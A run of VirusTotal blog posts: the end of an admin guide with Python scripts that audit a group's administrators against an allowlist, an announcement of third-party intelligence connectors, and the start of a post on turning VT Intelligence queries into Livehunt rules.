When using the VirusTotal web portal, the only difference to the previous example is the filter to be applied, which in this case is <b>View only admin users</b>.
</div>
<div class="central_img width_40 interval_12">
<img src="https://lh7-us.googleusercontent.com/itwkSa2uJHD3xTbhhQb95jeS9-5Vwnw4j_FlfjRnZ6CEODUb6tT5-gGp2oUb_NhojG_0b6f2b7QiLjlksP61RGTsxpGxuVOTD8VzOXi7zYjIdLRlasVlv0L1lri8sB3ZZ7EIOXViBE3H_5rcF-uzUR2JESSOYz7sg61gF09SdrA9GWD9JOzfjOkudWzx4nU" />
</div>
<div class="interval_12">
This task can be automated. The following Python script compares the users with admin privileges against a given list of administrators and reports any anomalies:
</div>
<div class="my-code interval_12">
<mark class="gray">"""</mark><br />
<mark class="gray">**DISCLAIMER:**</mark><br />
<mark class="gray">Please note that this code is for educational purposes only.</mark><br />
<mark class="gray">It is not intended to be run directly in production.</mark><br />
<mark class="gray">This is provided on a best effort basis.</mark><br />
<mark class="gray">Please make sure the code you run does what you expect it to do.</mark><br />
<mark class="gray">"""</mark><br />
<mark class="orange">import</mark> requests <br /><br />
<mark class="orange">def</mark> <mark class="yellow">get_possible_unauthorized_admins</mark>(apikey, group_id, authorized_admins):<br />
&nbsp;&nbsp;&nbsp;&nbsp;<mark class="gray">"""</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;<mark class="gray">Get the user objects (administrators) related to a group by group ID</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;<mark class="gray">and return those whose username is not in authorized_admins.</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;<mark class="gray">Requested user attributes: first_name, last_name, email.</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;<mark class="gray">VT API endpoint reference: https://docs.virustotal.com/reference/get-group-administrators</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;<mark class="gray">"""</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;unauthorized_admins = []<br />
&nbsp;&nbsp;&nbsp;&nbsp;url = <mark class="green">f"https://www.virustotal.com/api/v3/groups/{group_id}/administrators?attributes=first_name,last_name,email"</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;headers = {<mark class="green">"accept"</mark>: <mark class="green">"application/json"</mark>, <mark class="green">"x-apikey"</mark>: apikey}<br />
&nbsp;&nbsp;&nbsp;&nbsp;<mark class="gray"># Results are paginated: follow "links.next" until there is no next page.</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;<mark class="orange">while</mark> url:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;res = requests.get(url, headers=headers)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;res.raise_for_status()<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;res = res.json()<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<mark class="orange">for</mark> el <mark class="orange">in</mark> res[<mark class="green">"data"</mark>]:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<mark class="gray"># The user object's "id" is the VirusTotal username.</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<mark class="orange">if</mark> el[<mark class="green">"id"</mark>] <mark class="orange">not in</mark> authorized_admins:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;unauthorized_admins.append(<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<mark class="green">f"username: {el['id']}, "</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<mark class="green">f"first_name: {el['attributes'].get('first_name', '')}, "</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<mark class="green">f"last_name: {el['attributes'].get('last_name', '')}, "</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<mark class="green">f"email: {el['attributes'].get('email', '')}"</mark><br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;url = res.get(<mark class="green">"links"</mark>, {}).get(<mark class="green">"next"</mark>, <mark class="orange">None</mark>)<br />
&nbsp;&nbsp;&nbsp;&nbsp;<mark class="orange">return</mark> unauthorized_admins
</div>
<div class="interval_12">
The script uses the <a href="https://developers.virustotal.com/reference/groups-relationships" target="_blank">/v3/groups/{group_id}/administrators</a> endpoint, i.e. the group’s ‘administrators’ relationship, requesting the “first_name”, “last_name” and “email” attributes for each user. The ‘authorized_admins’ list is the allowlist: every administrator whose username is not on it is reported. Note that this only flags additions; an allowlisted user who has lost admin rights will not show up, so the allowlist itself should be kept under change control.
Check it out on our <a href="https://github.com/VirusTotal/vt-use-cases/blob/main/admins_guide/getting_possible_unauthorized_admins.py" target="_blank">GitHub repository</a>!
</div>
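<div class="interval_12">
The same check, written here as an added example rather than the script from the VirusTotal repository: it keeps the endpoint and the "data"/"links.next" paging contract described above but separates the HTTP call from the comparison, reports drift in both directions (admins missing from the allowlist and allowlisted users who are no longer admins), and refuses to follow a pagination cursor it has already seen. The group name, usernames, e-mail addresses and the second-page cursor are constructed so the script runs offline; <code>vt_fetcher</code> is the real call, using only the standard library.
</div>

```python
"""Reconcile a VirusTotal group's administrator list against an allowlist.

Added example, not VirusTotal's own script. Same endpoint and paging
contract as the original (a "data" array plus "links.next"), with the HTTP
call separated from the comparison so the logic can be exercised offline.
Group id, usernames and e-mail addresses below are constructed.
"""
import json
import urllib.request
from typing import Callable, Dict, Iterable, Iterator, List, Tuple

VT_API = "https://www.virustotal.com/api/v3"
Fetcher = Callable[[str], dict]  # maps a page URL to its decoded JSON body


def administrators_url(group_id: str) -> str:
    """First page of the group's 'administrators' relationship."""
    return f"{VT_API}/groups/{group_id}/administrators?attributes=first_name,last_name,email"


def vt_fetcher(apikey: str) -> Fetcher:
    """Real fetcher using the standard library; urlopen raises HTTPError on 4xx/5xx."""
    def fetch(url: str) -> dict:
        req = urllib.request.Request(
            url, headers={"accept": "application/json", "x-apikey": apikey})
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.load(resp)
    return fetch


def iter_administrators(first_url: str, fetch: Fetcher) -> Iterator[dict]:
    """Yield every user object across all pages, refusing to loop on a repeated cursor."""
    url, visited = first_url, set()
    while url:
        if url in visited:
            raise RuntimeError(f"pagination loop: {url} served twice")
        visited.add(url)
        page = fetch(url)
        yield from page.get("data", [])
        url = page.get("links", {}).get("next")


def reconcile_admins(admins: Iterable[dict], allowlist: Iterable[str]) -> Tuple[List[dict], List[str]]:
    """Return (unexpected user objects, allowlisted usernames that are no longer admins).

    Usernames are compared exactly: the allowlist must use the spelling the API
    returns in the user object's "id".
    """
    allowed = set(allowlist)
    by_id: Dict[str, dict] = {u["id"]: u for u in admins}
    unexpected = [by_id[name] for name in sorted(set(by_id) - allowed)]
    missing = sorted(allowed - set(by_id))
    return unexpected, missing


def describe(user: dict) -> str:
    """Same one-line report format as the original script."""
    a = user.get("attributes", {})
    return (f"username: {user['id']}, first_name: {a.get('first_name', '')}, "
            f"last_name: {a.get('last_name', '')}, email: {a.get('email', '')}")


def audit_group_admins(group_id: str, allowlist: Iterable[str], fetch: Fetcher) -> dict:
    """Fetch all administrators of group_id and report drift in both directions."""
    admins = list(iter_administrators(administrators_url(group_id), fetch))
    unexpected, missing = reconcile_admins(admins, allowlist)
    return {
        "total": len(admins),
        "unexpected": [describe(u) for u in unexpected],  # admins not on the allowlist
        "missing": missing,                               # allowlisted users no longer admins
    }


# Constructed sample: two pages of a fictitious group, shaped like v3 API responses.
_PAGE1 = administrators_url("example_group")
_PAGE2 = _PAGE1 + "&cursor=constructed-cursor"
SAMPLE_PAGES = {
    _PAGE1: {
        "data": [
            {"id": "alice", "type": "user",
             "attributes": {"first_name": "Alice", "last_name": "Example", "email": "alice@example.com"}},
            {"id": "bob", "type": "user",
             "attributes": {"first_name": "Bob", "last_name": "Example", "email": "bob@example.com"}},
        ],
        "links": {"self": _PAGE1, "next": _PAGE2},
    },
    _PAGE2: {
        "data": [
            {"id": "mallory", "type": "user", "attributes": {"email": "mallory@example.net"}},
        ],
        "links": {"self": _PAGE2},  # no "next": last page
    },
}


def sample_fetch(url: str) -> dict:
    """Offline stand-in for vt_fetcher() that serves the constructed pages."""
    return SAMPLE_PAGES[url]


if __name__ == "__main__":
    # For a real group: audit_group_admins(group, allowlist, vt_fetcher(os.environ["VT_APIKEY"]))
    print(json.dumps(audit_group_admins("example_group", ["alice", "bob", "carol"], sample_fetch), indent=2))
```

<div class="interval_12">
Against the constructed pages the report lists "mallory" as unexpected and "carol" as missing, with three administrators seen in total. The loop guard matters when a client follows whatever "next" the server returns: a repeated cursor would otherwise keep the script running forever.
</div>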
<br />
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12">
With these new resources, we aim to assist VirusTotal group administrators in their day-to-day duties. The documentation covers everything they can do in the web interface and, where possible, shows how to retrieve the same data through the API with plain Python scripts.
</div>
<div class="interval_12">
We hope you find this as useful as we do. If you have any questions, feedback or new use cases we can assist you with, please do not hesitate to <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">contact us</a>.
</div>
<div class="interval_12">
Happy management!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>Alexandra Martinhttp://www.blogger.com/profile/08447900589635774086noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-11831192077746041022023-10-26T15:59:00.001+02:002023-10-26T16:08:22.086+02:00Unifying threat context with VirusTotal connectors<div style="text-align: left;">
<span style="font-size: 11pt; white-space-collapse: preserve;">In an age where cyber threats continue to grow in
sophistication and
frequency, the pursuit of a unified threat contextualization platform is no
longer a mere convenience but an absolute necessity. When faced with an
unfamiliar file, hash, domain, IP address, or URL, having a singular view of
threat intelligence not only expedites investigations but also helps
eliminate detection blind spots.</span>
</div>
<div style="text-align: left;">
<div style="text-align: center;"><img alt="Connectors list" border="0" data-original-height="2100" data-original-width="2996" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj06c_its8jTw1jPbj0I1VuAIOgDA5NbzsO_3wV8GZaAaLeJevE0Ps9xT0lZ_XdnV1aAPDAQEb5KStmFBFOygdyHSw58KDHOtAMSRq2dTbOjmjCWO4go1DUBVeafS8ZgHAGdnsAJeTzPXIP62UdNi9C7YwHVRss9-diokVfMH4x8D0G5uQWyQuEBmsD4Sf9/s16000/Screenshot%202023-10-24%20at%2015.25.56.png" style="width: 100%;" /></div><div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-size: 11pt; white-space-collapse: preserve;"></span>
</div>
<div style="text-align: left;">
<span style="font-size: 11pt; white-space-collapse: preserve;">Today, we are taking a significant step toward realizing this unified threat contextualization with VirusTotal Connectors. That's right: all your threat intelligence from third parties will be seamlessly merged with VirusTotal's context!</span>
</div>
<div style="text-align: left;">
<span style="font-size: 11pt; white-space-collapse: preserve;"><br /></span>
</div>
<span id="docs-internal-guid-d8024a68-7fff-6f01-936f-1a23db0101bf">
<h4 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><b>Complementary threat context</b></span>
</h4>
<div>
<span face="Arial, sans-serif" style="font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">
<p dir="ltr" style="font-size: 11pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; white-space-collapse: preserve;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">While this post doesn't delve into specific third-party connectors,
we're excited to announce that Mandiant is among our first supported
connectors. More details about this will be covered in an upcoming
blog post.</span>
</p>
<p dir="ltr" style="font-size: 11pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; white-space-collapse: preserve;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">In addition to Mandiant, we are introducing two other connectors,
each offering distinct context for different use cases, provided by
leading security providers:</span>
</p>
<ul style="font-size: 11pt; margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px; text-align: left; white-space-collapse: preserve;">
<li aria-level="1" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;">
<p role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>Mandiant Intelligence</b></span><span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">
-</span><span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">
This connector allows you to incorporate Mandiant's malware
toolkit, campaign insights, and threat actor attributions into
VirusTotal. </span><a href="https://developers.virustotal.com/docs/docs-mandiant-connector" style="font-weight: 400; text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">Learn more</span></a><span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span>
</p>
</li>
<li aria-level="1" style="background-color: transparent; color: black; font-family: Arial, sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;">
<p role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>MISP</b></span><span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">
-</span><span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">
Enhance VirusTotal indicator of compromise reports with
information from MISP events, including descriptions, tags, and
other pertinent data generated by your Cyber Threat Intelligence
(CTI) team and trusted circles. </span><a href="https://developers.virustotal.com/docs/docs-misp-connector" style="font-weight: 400; text-decoration: none;"><span face="Arial,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">Learn more</span></a><span face="Arial, sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span>
</p>
</li>
<li>
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span id="docs-internal-guid-a6d6be84-7fff-360a-7564-20a102d2ef6b"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><b>Splunk</b></span><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-weight: 700; vertical-align: baseline;">
-</span><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">
Gain immediate insight into whether a specific VirusTotal IoC
has been detected in your environment, either presently or in
the past. </span><a href="https://developers.virustotal.com/docs/docs-splunk-connector" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">Learn more</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">.</span></span></span>
</li>
</ul>
<div>
<span id="docs-internal-guid-0df913cd-7fff-78a6-e215-de76e44216d5">
<h4 style="font-size: 11pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left; white-space-collapse: preserve;">
<b style="font-size: 11pt;">Configuration made easy</b>
</h4>
<div style="font-size: 11pt; white-space-collapse: preserve;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span id="docs-internal-guid-6c951c64-7fff-b92f-50f4-208624b89910"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Configuring VirusTotal connectors is a breeze. You can access
the configuration settings in the </span><a href="https://www.virustotal.com/gui/technology-integrations/third-party-to-vt" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">“Technology Integrations” section, under the “Connectors”
tab</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">. This is also accessible via the left navbar menu in
VirusTotal Enterprise or the top navbar in its landing, under
the Intelligence entry.</span></span></span>
</div>
<div>
<span style="font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span>
<div class="separator" style="clear: both; font-size: 11pt; text-align: center; white-space-collapse: preserve;">
<img border="0" data-original-height="2084" data-original-width="2944" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxuLR_29ZEB9YCXRQO_5AQAgsfXzYJQhNpkdjrYcrh2ERYt4H2s8O9yh2XbDMI7aUWWbZSk2ONatQsGFk-hUmblilDyNkDboDJ2DRzXykcIx4tIu5XXkMzfLtWsr6fKUCd38Kzosak5UIk9cED6oww9n7eaoA3BlRmiAE6hrPmQzDjJoWty77loACTsY8X/s16000/Screenshot%202023-10-24%20at%2017.15.23.png" />
</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: 14.6667px; white-space-collapse: preserve;">In a nutshell, all you need to do is configure API authentication for the corresponding intelligence provider (bring your own license), and VirusTotal will automatically retrieve any context that the third-party provider has on any indicator you query in VirusTotal. That context is integrated into the VirusTotal IoC report as the first section of the Detection tab, and it is visible only to you and your group. At this time the connectors' information is not available via the API. For additional guidance, please refer to our documentation.</span>
</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: 14.6667px; white-space-collapse: preserve;"><br /></span>
</div>
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"><span id="docs-internal-guid-788e672d-7fff-370d-da8e-12959d8c9599"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">
<h4 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">
<div>
<b style="font-size: 11pt;">Community development</b>
</div>
</span>
</h4>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Our journey doesn't stop here. We're
already in the process of supporting more
data providers. At VirusTotal, we firmly
believe in the power of community
collaboration. We're contemplating the
release of a framework that empowers our
community and third-party providers to
create and contribute their own connectors,
embodying our commitment to crowdsourced
security.</span>
</p>
<div>
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span id="docs-internal-guid-f2caa2a7-7fff-9943-4a14-8168c0313c80"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">If you are a customer looking to
connect one of your threat intelligence
sources or an industry player seeking
support for your solution, </span><a href="https://www.virustotal.com/gui/contact-us/suggestions" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">please do not hesitate to contact
us</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">.
</span></span></span>
</div>
</span></span></span></span></span></span></span></span>
</span></span>
</div>
<div style="font-size: 11pt; white-space-collapse: preserve;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span></span></span></span></span>
</div>
<div style="font-size: 11pt; white-space-collapse: preserve;">
<span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><span><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">Happy Hunting!</span></span></span></span></span>
</div>
</span>
</div>
</span>
</div>
</span>
Daniel Pascualhttp://www.blogger.com/profile/08323806282777764706noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-16980101721135398902023-10-17T10:48:00.002+02:002023-10-17T11:15:33.244+02:00The path from VT Intelligence queries to VT Livehunt rules: A CTI analyst approach<div class="interval_12">This post explains how to create a VT Livehunt rule from a VT Intelligence query, a common task in threat hunting and threat intelligence operations.</div>
<div class="interval_12"> Let’s assume that, as a threat hunter, you have built robust VT Intelligence (VTI) queries that return reliable results without false positives. They are so good that you run them daily to collect fresh samples, which is tedious to do by hand (pro tip: you can automate it through the API).
</div>
<div class="interval_12"> A better alternative is to convert your VTI query into a LiveHunt rule, so you are notified immediately whenever a newly uploaded file matches your criteria. Unfortunately, there is no automated way to convert Intelligence queries into LiveHunt rules (or vice versa), and in some cases it is not even possible to obtain exactly the same results (technical tl;dr: because of limitations in the stored data <a href="https://blog.virustotal.com/2023/09/its-all-about-structure-creating-yara.html" target="_blank">structure</a>).
</div>
<div class="interval_12"> But do not despair. In this post we walk through several practical cases of LiveHunt rules built from VT Intelligence queries, show how you can do it yourself, and discuss the pros, cons and limitations of the approach.
</div>
<h2 style="text-align: left;">The perfect query ̶d̶o̶e̶s̶n̶’̶t̶ exist </h2>
<div class="interval_12"> <b>Bitter APT</b> </div>
<div class="interval_12"> <a href="https://www.virustotal.com/gui/threat-actor/1e9bd6fe-e009-41ce-8e92-ad78c73ee772" target="_blank">Bitter APT</a> is a <a href="https://attack.mitre.org/groups/G1002/" target="_blank">suspected South Asian cyber espionage</a> threat group. Security researchers like <a href="https://twitter.com/StopMalvertisin" target="_blank">StopMalvertisin</a>, among others, regularly publish information about this actor in both <a href="https://twitter.com/StopMalvertisin/status/1685214676643422208" target="_blank">X</a> and <a href="https://www.virustotal.com/gui/file/1ea9e9ecd0e5b0ac4aedc1b5515484a372dd8aefb1dbeb00f243a0a3ce40fab9/community" target="_blank">VirusTotal community</a>. </div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/VGBxRvyVHNe2E_xA3UOuxjVw3BHWgQkT-InkJJ3lW7AdWDf7zRpBKXEJbeA-z90U01Uw72cpPjSHkEsqUKixfAPKpqHEl7Ug2PiVDFHaENCAhoz3zdqHXInETdpQb4NqB9q9GJbXpU5IqiIoU6pYV7W930EnDSUzFxzNcANbDg26so3rbKk6zIzYJrPtTVM" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /><figcaption><small><a href="https://www.virustotal.com/gui/file/1ea9e9ecd0e5b0ac4aedc1b5515484a372dd8aefb1dbeb00f243a0a3ce40fab9/community" target="_blank">https://www.virustotal.com/gui/file/1ea9e9ecd0e5b0ac4aedc1b5515484a372dd8aefb1dbeb00f243a0a3ce40fab9/community</a></small>
</figcaption></div></span></div>
<div class="interval_12"> To start hunting for files related to Bitter APT, you probably want to subscribe to any attributed VirusTotal collection or the threat actor profile itself.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/rXWKhvIBoCdH5_-L_MsEyLSP2G4gFssDL2mVP-g3tr2MstaQrQIJ-xk6Zn5OjuCxkmk3KIXDP2zTYDtlir6M4I9bI0DUOieemwGyLXggG9cyywde5_qoUtNvCJ88kExX_9SQ1RZLdaN-UNQ6evTGE70f7JgLH0OOosFqdFMzoUr_5sbkdATCFkURk0PT3LU" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /><figcaption><small><a href="https://www.virustotal.com/gui/threat-actor/1e9bd6fe-e009-41ce-8e92-ad78c73ee772/summary" target="_blank">https://www.virustotal.com/gui/threat-actor/1e9bd6fe-e009-41ce-8e92-ad78c73ee772/summary</a></small>
</figcaption></div></span></div>
